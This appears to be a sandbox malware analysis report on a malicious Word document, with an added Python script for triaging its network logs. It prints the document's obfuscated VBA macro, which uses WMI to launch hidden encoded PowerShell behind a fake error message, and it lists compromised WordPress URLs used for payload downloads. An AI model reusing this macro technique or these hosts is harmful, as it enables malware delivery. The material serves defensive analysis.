                                              Data Raw: 32 30 65 65 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 20 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 38 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 39 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 39 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 7c 20 44 72 2e 41 6e 64 72 65 61 20 44 61 76 69 73 2c 20 50 75 62 6c 69 63 20 48 65 61 6c 74 68 20 45 78 70 65 72 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6b 65 74 6f 72 65 73 65 74 6d 65 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 65 74 6f 72 65 73 65 74 6d 65 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 30 2f 30 39 2f 74 74 74 2e 70 6e 67 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 
74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 44 72 2e 41 6e 64 72 65 61 20 44 61 76 69 73 2c 20 50 75 62 6c 69 63 20 48 65 61 6c 74 68 20 45 78 70 65 72 74 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 65 74 6f
                                              Data Ascii: 20ee<!doctype html >...[if IE 8]> <html class="ie8" lang="en"> <![endif]-->...[if IE 9]> <html class="ie9" lang="en"> <![endif]-->...[if gt IE 8]>...> <html lang="en-US"> ...<![endif]--><head> <title>Page not found | Dr.Andrea Davis, Public Health Expert</title> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="pingback" href="http://ketoresetme.com/xmlrpc.php" /> <link rel="icon" type="image/png" href="https://ketoresetme.com/wp-content/uploads/2020/09/ttt.png"><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel='dns-prefetch' href='//s.w.org' /><link rel="alternate" type="application/rss+xml" title="Dr.Andrea Davis, Public Health Expert &raquo; Feed" href="https://keto
Jan 7, 2021 11:47:31.352494955 CET | 55 | IN | Data Raw: 72 65 73 65 74 6d 65 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 44 72 2e 41
Data Ascii: resetme.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Dr.Andrea Davis, Public Health Expert &raquo; Comments Feed" href="https://ketoresetme.com/comments/feed/" /><script type="text/javascript">window._wpemojiSet
Jan 7, 2021 11:47:31.352545023 CET | 56 | IN | Data Raw: 35 35 33 35 37 2c 35 36 34 32 34 2c 38 32 30 33 2c 35 35 33 35 36 2c 35 37 32 31 32 5d 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 64 28 65 29 7b 76 61 72 20 74 3d 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70
Data Ascii: 55357,56424,8203,55356,57212])}return!1}function d(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(i=Array("flag","emoji"),t.supports={everything:!0,everythingExc
Jan 7, 2021 11:47:31.352581978 CET | 57 | IN | Data Raw: 65 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 6c 69 62 72 61 72 79 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 6b 65 74 6f 72 65 73 65 74 6d 65 2e 63 6f 6d
Data Ascii: e><link rel='stylesheet' id='wp-block-library-css' href='http://ketoresetme.com/wp-includes/css/dist/block-library/style.min.css?ver=5.5.3' type='text/css' media='all' /><link rel='stylesheet' id='wc-block-vendors-style-css' href='http://
Jan 7, 2021 11:47:31.352615118 CET | 59 | IN | Data Raw: 6d 65 64 69 61 3d 27 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 36 38 70 78 29 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 6f 6f 63 6f 6d 6d 65 72
Data Ascii: media='only screen and (max-width: 768px)' /><link rel='stylesheet' id='woocommerce-general-css' href='http://ketoresetme.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=4.5.1' type='text/css' media='all' /><style id='wooc
Jan 7, 2021 11:47:31.352646112 CET | 60 | IN | Data Raw: 65 2d 6c 61 77 2d 69 6e 66 6f 2d 6a 73 2d 65 78 74 72 61 27 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 76 61 72 20 43 6c 69 5f 44 61 74 61 20 3d 20 7b 22 6e 6e 5f 63 6f 6f 6b 69 65 5f 69 64 73 22 3a 5b 5d 2c 22 63 6f 6f 6b 69 65 6c 69
Data Ascii: e-law-info-js-extra'>/* <![CDATA[ */var Cli_Data = {"nn_cookie_ids":[],"cookielist":[],"ccpaEnabled":"","ccpaRegionBased":"","ccpaBarEnabled":"","ccpaType":"gdpr","js_blocking":"1","custom_integration":"","triggerDomRefresh":""};var cli_coo
Jan 7, 2021 11:47:31.352674007 CET | 61 | IN | Data Raw: 61 67 61 69 6e 22 2c 22 73 68 6f 77 61 67 61 69 6e 5f 78 5f 70 6f 73 69 74 69 6f 6e 22 3a 22 31 30 30 70 78 22 2c 22 74 65 78 74 22 3a 22 23 33 33 33 33 33 33 22 2c 22 73 68 6f 77 5f 6f 6e 63 65 5f 79 6e 22 3a 22 22 2c 22 73 68 6f 77 5f 6f 6e 63
Data Ascii: again","showagain_x_position":"100px","text":"#333333","show_once_yn":"","show_once":"10000","logging_on":"","as_popup":"","popup_overlay":"1","bar_heading_text":"","cookie_bar_as":"banner","popup_showagain_position":"bottom-right","widget_pos
Jan 7, 2021 11:47:31.354415894 CET | 63 | IN | Data Raw: 34 30 30 30 0d 0a 09 3c 73 74 79 6c 65 20 69 64 3d 22 74 64 77 2d 63 73 73 2d 70 6c 61 63 65 68 6f 6c 64 65 72 22 3e 3c 2f 73 74 79 6c 65 3e 09 09 09 3c 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 77 69 6e 64 6f 77 2e 74 64 77 47 6c 6f 62 61 6c 20 3d
Data Ascii: 4000<style id="tdw-css-placeholder"></style><script>window.tdwGlobal = {"adminUrl":"https:\/\/ketoresetme.com\/wp-admin\/","wpRestNonce":"248f3fd52c","wpRestUrl":"https:\/\/ketoresetme.com\/wp-json\/","permalinkStructure":"\/%year%
Jan 7, 2021 11:47:31.354450941 CET | 64 | IN | Data Raw: 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2f 2f 20 74 64 5f 6a 73 5f 67 65 6e 65 72 61 74 6f 72 20 2d 20 6d 69 6e 69 20 64 65 74 65 63 74 6f 72 0d 0a 20 20 20 20 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20
Data Ascii: // td_js_generator - mini detector (function(){ var htmlTag = document.getElementsByTagName("html")[0]; if ( navigator.userAgent.indexOf("MSIE 10.0") > -1 ) { htmlTag.className
Jan 7, 2021 11:47:31.382409096 CET | 65 | IN | Data Raw: 27 20 74 64 2d 6d 64 2d 69 73 2d 73 61 66 61 72 69 27 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 20 2d 31 20 21 3d 3d 20 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 69
Data Ascii: ' td-md-is-safari'; } if( -1 !== navigator.userAgent.indexOf('IEMobile') ){ htmlTag.className += ' td-md-is-iemobile'; } })(); var tdLocalCache = {};
Jan 7, 2021 11:47:31.502430916 CET | 67 | IN | Data Raw: 73 74 61 63 6b 5f 67 65 6e 65 72 61 6c 5f 73 65 6c 65 63 74 6f 72 73 3d 22 2e 74 64 2d 61 6e 69 6d 61 74 69 6f 6e 2d 73 74 61 63 6b 20 69 6d 67 2c 20 2e 74 64 2d 61 6e 69 6d 61 74 69 6f 6e 2d 73 74 61 63 6b 20 2e 65 6e 74 72 79 2d 74 68 75 6d 62
Data Ascii: stack_general_selectors=".td-animation-stack img, .td-animation-stack .entry-thumb, .post img";var td_ajax_url="https:\/\/ketoresetme.com\/wp-admin\/admin-ajax.php?td_theme_name=Newspaper&v=8.1";var td_get_template_directory_uri="http:\/\/ke
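The sessions above are the ones a responder turns into indicators: powershell.exe issues a bare GET (Host and Connection only, no User-Agent) to one compromised WordPress site after another, gets a 404 and moves on to the next name in its list. This report's packet tables were extracted with their columns run together ("CET8049172103.8.25.63192.168.2.22"), which makes them awkward to feed into anything. The Python below is an added example, not part of the Joe Sandbox report: it splits such rows back into fields, joins the TCP conversations with the DNS answers, and flags requests that carry no User-Agent header, which is the behaviour behind the report's "HTTP GET or POST without a user agent" signature. The sandbox address 192.168.2.22, the service-port set {53, 80, 443} and the Windows ephemeral range starting at 49152 are assumptions read off the tables; concatenated ports are otherwise ambiguous, so a row is accepted only when exactly one split pairs a service port with an ephemeral one. The sample rows are copied from the tables above; the second request is a constructed benign control.

```python
"""Added example (not part of the Joe Sandbox report): parse this report's
flattened packet tables and triage them. A row such as
"Jan 7, 2021 11:48:05.273067951 CET8049172103.8.25.63192.168.2.22" means
source port 80, destination port 49172, 103.8.25.63 -> 192.168.2.22.
SANDBOX_IP, SERVICE_PORTS and EPHEMERAL_MIN are assumptions read off the tables."""
import re

SANDBOX_IP = "192.168.2.22"    # the analysis VM, one end of every conversation
SERVICE_PORTS = {53, 80, 443}  # server-side ports that occur in this report
EPHEMERAL_MIN = 49152          # start of the Windows dynamic client-port range
TS_RE = re.compile(r"^(?P<ts>.+? CET)(?P<rest>[\d.]+)$")
DNS_RE = re.compile(r"No error \(0\)(?P<name>[a-z0-9.-]*[a-z])"
                    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3})A \(IP address\)")


def valid_ipv4(s):
    """Dotted quad, octets 0-255, no leading zeros."""
    o = s.split(".")
    return len(o) == 4 and all(
        x.isdigit() and int(x) <= 255 and (x == "0" or x[0] != "0") for x in o)


def split_ports(digits):
    """(sport, dport) if exactly one split pairs a service port with an
    ephemeral one; a digit run such as '8049172' is ambiguous without that rule."""
    hits = []
    for i in range(1, len(digits)):
        a, b = int(digits[:i]), int(digits[i:])
        if max(a, b) <= 65535 and ((a in SERVICE_PORTS and b >= EPHEMERAL_MIN)
                                   or (b in SERVICE_PORTS and a >= EPHEMERAL_MIN)):
            hits.append((a, b))
    return hits[0] if len(hits) == 1 else None


def split_packet_row(row):
    """Return (timestamp, sport, dport, src_ip, dst_ip) for one flattened row."""
    m = TS_RE.match(row)
    if not m:
        raise ValueError("no timestamp in %r" % row)
    ts, rest = m.group("ts"), m.group("rest")
    if rest.endswith(SANDBOX_IP):               # remote -> sandbox
        head, tail = rest[:-len(SANDBOX_IP)].split(".", 1)
        found = []                              # head = both ports + first octet
        for k in (1, 2, 3):                     # a first octet has 1-3 digits
            ip, ports = head[-k:] + "." + tail, split_ports(head[:-k])
            if valid_ipv4(ip) and ports:
                found.append((ports, ip))
        if len(found) != 1:
            raise ValueError("ambiguous row %r" % row)
        (sport, dport), remote = found[0]
        return ts, sport, dport, remote, SANDBOX_IP
    i = rest.find(SANDBOX_IP)                   # sandbox -> remote
    if i < 0:
        raise ValueError("sandbox IP not in %r" % row)
    ports, remote = split_ports(rest[:i]), rest[i + len(SANDBOX_IP):]
    if not ports or not valid_ipv4(remote):
        raise ValueError("unparseable row %r" % row)
    return ts, ports[0], ports[1], SANDBOX_IP, remote


def parse_dns_answer(row):
    """(name, address) from a flattened 'DNS Answers' row, or None."""
    m = DNS_RE.search(row)
    return (m.group("name"), m.group("ip")) if m else None


def request_headers(raw):
    """Lower-cased header names -> values of a raw HTTP request."""
    hdrs = {}
    for line in raw.splitlines()[1:]:
        if not line.strip():
            break
        name, _, value = line.partition(":")
        hdrs[name.strip().lower()] = value.strip()
    return hdrs


def triage(tcp_rows, dns_rows, requests):
    """Map each remote IP to its resolved names and server ports, and list the
    request lines sent without a User-Agent (the report's 'without a user agent')."""
    names = {}
    for row in dns_rows:
        parsed = parse_dns_answer(row)
        if parsed:
            names.setdefault(parsed[1], set()).add(parsed[0])
    hosts = {}
    for row in tcp_rows:
        _, sport, dport, src, dst = split_packet_row(row)
        remote, port = (dst, dport) if src == SANDBOX_IP else (src, sport)
        entry = hosts.setdefault(remote, {"names": names.get(remote, set()), "ports": set()})
        entry["ports"].add(port)
    no_ua = [r.splitlines()[0] for r in requests if "user-agent" not in request_headers(r)]
    return hosts, no_ua


# Sample input: rows copied from the tables above, plus one constructed benign
# request (control.example is made up) that does carry a User-Agent.
TCP_ROWS = [
    "Jan 7, 2021 11:48:05.273067951 CET8049172103.8.25.63192.168.2.22",
    "Jan 7, 2021 11:48:05.273220062 CET4917280192.168.2.22103.8.25.63",
    "Jan 7, 2021 11:48:05.664499998 CET49173443192.168.2.2235.209.78.196",
    "Jan 7, 2021 11:48:05.824990034 CET4434917335.209.78.196192.168.2.22",
]
DNS_ROWS = [
    "Jan 7, 2021 11:48:02.777923107 CET8.8.8.8192.168.2.220x62a5No error (0)"
    "thebestfikrah.com103.8.25.63A (IP address)IN (0x0001)",
    "Jan 7, 2021 11:48:05.663836956 CET8.8.8.8192.168.2.220x194aNo error (0)"
    "phawayagency.com35.209.78.196A (IP address)IN (0x0001)",
]
REQUESTS = [
    "GET /wp-admin/fOIlVX/ HTTP/1.1\r\nHost: thebestfikrah.com\r\nConnection: Keep-Alive\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: control.example\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
]

if __name__ == "__main__":
    hosts, no_ua = triage(TCP_ROWS, DNS_ROWS, REQUESTS)
    for ip, info in sorted(hosts.items()):
        print(ip, sorted(info["names"]), sorted(info["ports"]))
    print("requests without User-Agent:", no_ua)
```

Run against the full tables, `triage` yields the same host list as the HTTP Request Dependency Graph plus the TLS-only contacts (35.209.78.196 on 443, 58.97.195.135 on 443) that the graph omits because no HTTP request was decoded for them. The ephemeral-port rule is what makes the reconstruction safe: for "4434917335.209.78.196" both "443 | 4917 | 35.209.78.196" and "443 | 49173 | 35.209.78.196" are syntactically possible, and only the second has a client port in the dynamic range.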


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              2 | 192.168.2.22 | 49172 | 103.8.25.63 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Jan 7, 2021 11:48:02.983000040 CET | 161 | OUT | GET /wp-admin/fOIlVX/ HTTP/1.1
                                              Host: thebestfikrah.com
                                              Connection: Keep-Alive
                                              Jan 7, 2021 11:48:05.069173098 CET | 162 | IN | HTTP/1.1 404 Not Found
                                              Date: Thu, 07 Jan 2021 10:48:02 GMT
                                              Server: Apache
                                              X-UA-Compatible: IE=edge
                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                              Link: <https://thebestfikrah.com/wp-json/>; rel="https://api.w.org/"
                                              Vary: Accept-Encoding,User-Agent
                                              Referrer-Policy: no-referrer-when-downgrade
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Transfer-Encoding: chunked
                                              Content-Type: text/html; charset=UTF-8


                                              Code Manipulations

                                              Statistics

                                              CPU Usage

                                              Memory Usage

                                              High Level Behavior Distribution

                                              Behavior

                                              System Behavior

                                              General

                                              Start time:11:46:35
                                              Start date:07/01/2021
                                              Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                              Imagebase:0x13fbf0000
                                              File size:1424032 bytes
                                              MD5 hash:95C38D04597050285A18F66039EDB456
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:11:46:37
                                              Start date:07/01/2021
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 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
                                              Imagebase:0x4a9a0000
                                              File size:345088 bytes
                                              MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              General

                                              Start time:11:46:38
                                              Start date:07/01/2021
                                              Path:C:\Windows\System32\msg.exe
                                              Wow64 process (32bit):false
                                              Commandline:msg user /v Word experienced an error trying to open the file.
                                              Imagebase:0xffe60000
                                              File size:26112 bytes
                                              MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              General

                                              Start time:11:46:39
                                              Start date:07/01/2021
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:POwersheLL -w hidden -ENCOD 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
                                              Imagebase:0x13f410000
                                              File size:473600 bytes
                                              MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2217570571.0000000001BA6000.00000004.00000001.sdmp, Author: Florian Roth
                                              • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2217397039.0000000000106000.00000004.00000001.sdmp, Author: Florian Roth
                                              Reputation:high

                                              Disassembly

                                              Code Analysis

                                              Call Graph

                                              Graph

                                              callgraph (node id, function, API calls, outgoing edges):
                                              • 913 Document_open -> 2
                                              • 2 Nr8et74sjtle6s (Len:1, Create:1, Mid:1, FreeFile:12, CreateObject:1) -> 609 (x 2)
                                              • 609 Tfizx5uxnfjbxnml (FreeFile:4) -> 801
                                              • 801 Xrl25i0p5sd_oj40b (Replace:1, FreeFile:2)

                                              Module: Jwq9b1lb0hmm7

                                              Declaration
                                              Line | Content
                                              1

                                              Attribute VB_Name = "Jwq9b1lb0hmm7"

                                              Executed Functions
                                              APIs | Meta Information

                                              Item

                                              FreeFile

                                              Open

                                              Open

                                              LOF

                                              intGend

                                              FreeFile

                                              Open

                                              Open

                                              LOF

                                              intGend

                                              FreeFile

                                              Open

                                              Open

                                              LOF

                                              intGend

                                              FreeFile

                                              Open

                                              Open

                                              LOF

                                              intGend

                                              FreeFile

                                              Open

                                              Open

                                              LOF

                                              intGend

                                              FreeFile

                                              Open

                                              Open

                                              LOF

                                              intGend

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: FreeFile

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: LOF

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: intGend

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: FreeFile

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: LOF

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: intGend

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: FreeFile

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: LOF

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: intGend

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: FreeFile

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: LOF

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: intGend

                                              FreeFile

                                              Open

                                              Open

                                              LOF

                                              intGend

                                              CreateObject

                                              CreateObject("winmgmts:win32_process")

                                              FreeFile

                                              Open

                                              Open

                                              LOF

                                              intGend

                                              Mid

                                              Len


                                              FreeFile

                                              Open

                                              Open

                                              LOF

                                              intGend

                                              FreeFile

                                              Open

                                              Open

                                              LOF

                                              intGend

                                              Create

                                              SWbemObjectEx.Create("cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 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,,) -> 0

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: FreeFile

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: LOF

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: intGend

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: FreeFile

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: LOF

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: intGend

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: FreeFile

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: LOF

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: intGend

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: FreeFile

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: LOF

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: intGend

                                              Il6ap8xlb73

                                              C1lvz_08ro0vrbmv6

                                              FreeFile

                                              Open

                                              Open

                                              LOF

                                              intGend

                                              FreeFile

                                              Open

                                              Open

                                              LOF

                                              intGend

                                              Strings | Decrypted Strings
                                              "F:\VqVSEFdE\MWGOECeCF\PfclaI.OeGfCLIU"
                                              "O:\WQqDe\KszDkOWIC\ttjarADJ.HmKSFGCfE"
                                              "]b2[sp]b2[s"
                                              "]b2[sro]b2[s]b2[sce]b2[ss]b2[ss]b2[s]b2[s"
                                              "F:\jfmsCJLQ\OVuohC\iqVBCCBoF.pAzGmA"
                                              "O:\ZrqrOBE\FXQPgFGG\sXMnHEFDC.KjybCdXDB"
                                              "]b2[s:w]b2[s]b2[sin]b2[s3]b2[s2]b2[s_]b2[s"
                                              "F:\wNSIF\NalQICj\SnhzIBQCA.WlbcmBJ"
                                              "O:\NSaqADG\xcZtJId\QXNwGFN.KtgHGEA"
                                              "w]b2[sin]b2[sm]b2[sgm]b2[st]b2[s]b2[s"
                                              "F:\DMRGvDLCX\DXrWE\kOeDmD.yjIGHMCl"
                                              "O:\zwfmA\FZQAOA\MnHvGI.RIeDASf"
                                              "]b2[ss]b2[s"
                                              "F:\AKQUADx\HTvZJNG\ezFFDE.dCWKQ"
                                              "O:\wYEmvKo\npTgDE\QjFhGJ.dWmjGFD"
                                              "F:\ySkIB\qKFmg\KrORs.CZcSEH"
                                              "O:\rrOzBX\vKCgAGJu\YNZlI.zUSFWsZF"
                                              "F:\EiaVDDCIE\RgrHGIHJ\YsPmFt.nHOaP"
                                              "O:\YNLYhp\IlEWOXUB\zsUqqD.dEGfRCFGF"
                                              "F:\WVuZGJAu\ksDKBbCz\XkJlEj.CrnAcG"
                                              "O:\BNSoFH\dvEzG\mUAiwC.yubtGH"
                                              "F:\LFwuAJBD\MeKNHEh\XqeRErUC.bMHKAFLIh"
                                              "O:\GVNBCFD\RBPGB\hCZaAY.voqXFB"
                                              "F:\mWSwpXAkG\PTfrgAdE\ddNtJFJ.OGZBEnFW"
                                              "O:\MRWMgFJ\zsKRHI\OiSxC.XZZmtH"
                                              "F:\CmMyA\WnqICJj\RxyolAqJ.nRDeH"
                                              "O:\bIYmeeW\uNvuErAyD\EIuXFu.FZTwFCBPD"
                                              "F:\ttHCHFDz\vMPdJC\ZVyvz.VjTkH"
                                              "O:\BccaMZ\jTkNfIWH\wtXBIkAZ.sSCvDComF"
Line | Instruction | Meta Information
2 | Function Nr8et74sjtle6s() |
3 | On Error Resume Next | executed
4 | mKbjhqs = Ouz_y28f7ehnqn.StoryRanges.Item(244 / 244) | Item
5 | Goto ywWmAGeG |
6 | Dim VORRAG() as Byte |
7 | Dim DfnXDeC as Integer |
8 | DfnXDeC = FreeFile | FreeFile
9 | Open "F:\VqVSEFdE\MWGOECeCF\PfclaI.OeGfCLIU" For Binary Access Read As # DfnXDeC | Open
10 | Open "O:\WQqDe\KszDkOWIC\ttjarADJ.HmKSFGCfE" For Binary Access Read As # DfnXDeC | Open
11 | Redim VORRAG(1 To LOF(intGend) - 5) | LOF; intGend
12 | Get # DfnXDeC, , VORRAG |
13 | Get # DfnXDeC, , VORRAG |
14 | Get # DfnXDeC, , VORRAG |
15 | Close # DfnXDeC |
15 | ywWmAGeG: |
17 | snahbsd = "]b2[sp]b2[s" |
18 | Umvc8xcohh1q3zu0kx = "]b2[sro]b2[s]b2[sce]b2[ss]b2[ss]b2[s]b2[s" |
19 | Goto gNNhpjuZF |
20 | Dim JeDBhB() as Byte |
21 | Dim efPVC as Integer |
22 | efPVC = FreeFile | FreeFile
23 | Open "F:\jfmsCJLQ\OVuohC\iqVBCCBoF.pAzGmA" For Binary Access Read As # efPVC | Open
24 | Open "O:\ZrqrOBE\FXQPgFGG\sXMnHEFDC.KjybCdXDB" For Binary Access Read As # efPVC | Open
